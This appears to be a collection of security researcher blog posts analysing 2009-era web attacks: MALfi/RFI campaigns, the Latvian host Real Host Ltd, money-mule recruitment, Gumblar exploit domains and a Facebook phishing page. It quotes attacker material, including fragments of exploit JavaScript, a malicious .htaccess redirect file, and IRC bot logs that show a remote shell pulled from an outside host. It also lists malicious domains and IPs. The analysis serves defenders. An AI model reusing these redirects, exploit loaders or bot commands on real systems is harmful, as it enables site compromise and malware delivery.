To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

Rather than rehash the purpose for the report, here’s an excerpt from the abstract:

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – hostexploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. hostexploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(“%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(‘OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

• Exploits including unpatched (or soon to be patched) 0days
• Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
• Phishing sites
• Moneymule recruitment sites
• Botnet Command and Control servers
• Hosting of cybercrime websites – Iframe programs
• Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

A little manual investigation led me to the following:

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

www.youtube.com/watch?v=DNx9iMcRAQg

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic . I’ve included virus total results, domains involved, etc at the end of the post.

Sit back, relax and enjoy the ride.

www.youtube.com/watch?v=9HdA1lC2PWM

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acroat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit

Another method I’d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”.  A quick search leads us to this article over at abuse.ch.

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.

I’ve cobbled together a little script that will read my web logs and spit out all the attack attempts and some stats as well. The script may result in some false positives so please take that into consideration. The suspected attacks and stats will be updated once a day and if things go well I may seed some more dorks into the blog to generate more hits.

Hopefully this will be a good source of live data for anyone wanting to research RFI attacks, please keep in mind that most of the attacking domains are compromised web servers themselves.

The details are on the left sidebar under “RFI Attacks”.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

<bot> [*] RFI Scan started -> 75 sites/process
<bot> [+] Bug: index.php?sayfa=
<bot> [+] Dork: “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >YAHOO : 0 > “index.php?sayfa=”
<bot> [~] >ASK : 126 > “index.php?sayfa=”
<bot> [~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
<bot> [~] >UOL : 390 > “index.php?sayfa=”
<bot> [~] >MSN : 2997 > “index.php?sayfa=”
<bot> [~] >ALTAVISTA : 630 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >GOOGLE : 0 > “index.php?sayfa=”
<bot> [~] >MSN : 3057 > “index.php?sayfa=”
<bot> [~] >ASK : 363 > “index.php?sayfa=”
<bot> [~] >UOL : 225 > “index.php?sayfa=”
<bot> [~] >VIRGILIO : 0 > “index.php?sayfa=”
<bot> [~] >LYCOS : 1731 > “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [*] >EXPLOITABLES: 4561 “index.php?sayfa=”
<bot> [+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

<bot> (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
<bot> (uname -a) Windows NT HERA 5.0 build 2195
<bot> (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
<bot> [+] Trying to spread ..
<bot> [%] _/ Exploiting 100 / 4561
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user “andy” may issue administrative commands to the bot.

my @admins = (“andy”);
my $killpwd   = “adminpass”; #Password to Kill the Bot

Show bot commands

<andy> !help
<RFI[13]> [!] !response  > Test if the RFI Response is working
<RFI[13]> [*] !chid <new rfi-id>  > Change the RFI-Response
<RFI[13]> [*] !killme  > KILL The Bot
<RFI[13]> [!] !milw0rm rss  > Get the last Milw0rm bugs
<RFI[13]> [!] !new rfi bugs  > Get the last 10 RFI bugs
<RFI[13]> [!] !new lfi bugs  > Get the last 10 LFI bugs
<RFI[13]> [!] !new sql bugs  > Get the last 10 SQL Injection bugs
<RFI[13]> [!] !new rce bugs  > Get the last 10 RCE bugs
<RFI[13]> [!] !cari <bug> <dork> -p <sites/proc>  > Start the RFI Scanner
<RFI[13]> [!] !lfi <bug> <dork>  > Start the LFI Scanner
<RFI[13]> [!] !sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
<RFI[13]> [!] !rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner
<RFI[13]> [!] !mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc>  > Start the Mass Scan
<RFI[13]> [*] !cmd <bashline>  > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
<RFI[13]> [*] !sspread -s <RFI_Vuln_site>  > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
<RFI[13]> [*] !admin add/remove <nickname>  > To add/remove a nickname to/from the admin list
<RFI[13]> [*] /msg RFI[13] !Sec ON/OFF -p <pwd>  > To enable or disable Security Mode
<RFI[13]> [*] /msg RFI[13] !Spread ON/OFF -p <pwd>  > To enable or disable Spread Mode
<RFI[13]> [!] !info  > Get infos about the Bot

Gather information

<andy> !info
<RFI[13]> [i] Release : v6 -Private IrcBot
<RFI[13]> [i] Author  : Attacker Nickname
<RFI[13]> [i] Contact : attacker@some.com
<RFI[13]> [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
<RFI[13]> [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00
<RFI[13]> [i] Spread Mode: OFF
<RFI[13]> [i] Security Mode: OFF

Remove the bot (admin only)

<andy> !cmd rm myscan2.txt (optional step if you know the name of the bot file)
<andy> !killme
<RFI[13]> [!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = “attacker nickname”;
$authmail = “attacker@some.com”;

Here is the Wepawet output of the exploit script employed on each of the hostile domains I mentioned in my previous post.

Virus Total results for the main exploit script
Virus Total results for the flash exploit
Virus Total results for the PDF exploit

Exploit code is hosted at:

[gumblarserver].cn:8080/
[gumblarserver].cn:8080/cache/flash.swf
[gumblarserver].cn:8080/cache/readme.pdf

The following is the portion of the script that loads the exploits. The pdfswf() function executes and loads two iframes which reference the exploits.

function pdfswf()
{
PDF = new Array(“AcroPDF.PDF”, “PDF.PdfCtrl”);
for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
document.write(‘<iframe src=”cache/readme.pdf”></iframe>’);
}
}
catch(e){}
}
try
{
obj = new ActiveXObject(“ShockwaveFlash.ShockwaveFlash”);

if (obj)
{
document.write(‘<iframe src=”cache/flash.swf”></iframe>’);
}
}
catch(e){}
}
pdfswf();

On an interesting note, it appears the location of where the malware author might have compiled the flash file is embedded in the flash movie. This information is gathered from using: swfdump -atpdu flash.swf.

-=> 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20  erGC:\Documents
-=> 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76  and Settings\dev
-=> 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51  \Desktop\exp;;HQ

C:\Documents and Settings\dev\Desktop\exp

More Gumblar domains are hosted on 70.85.142.250 Link

I haven’t checked all of them, but these are the domains that I suspect are involved.

casinoslotbet.cn
bigbestfind.cn
autobestwestern.cn
casinoslotbet.cn
bigbestfind.cn
findbigbrother.cn
finditbig.cn
giantbeaversdiet.cn
giantnonfat.cn
greatbethere.cn
tvnameshop.cn

My personal favorite would have to be giantbeaversdiet.cn which hosts the binary payload that starts the chain of infection as described in the previous post. (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8)

Who comes up with these domain names anyway??

XXXXX sent you a message.

Subject: Hi

“Look at bestspace.be”

I’ve included a screenshot of the site below, note that it looks like the facebook login page complete with poor spelling of “helps”.

bestspace.be

The form sends your stolen credentials back to bestspace.be for processing:

<form method=”POST” action=”/?login_attempt=1″>

Digging a little deeper we find this site is hosted on  211.95.78.98 which hosts a few other malicious domains as well:

degunter.cn
daratop.cn

Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more information and so does the Malware Domains List.

The registrant of daratop.cn is steven_lucas_2000@yahoo.com, a couple of searches for this email reveals many different attacks that this individual has been involved in.

Example 1
Exmaple 2

In closing, all of these sites are hostile and should be blocked and avoided.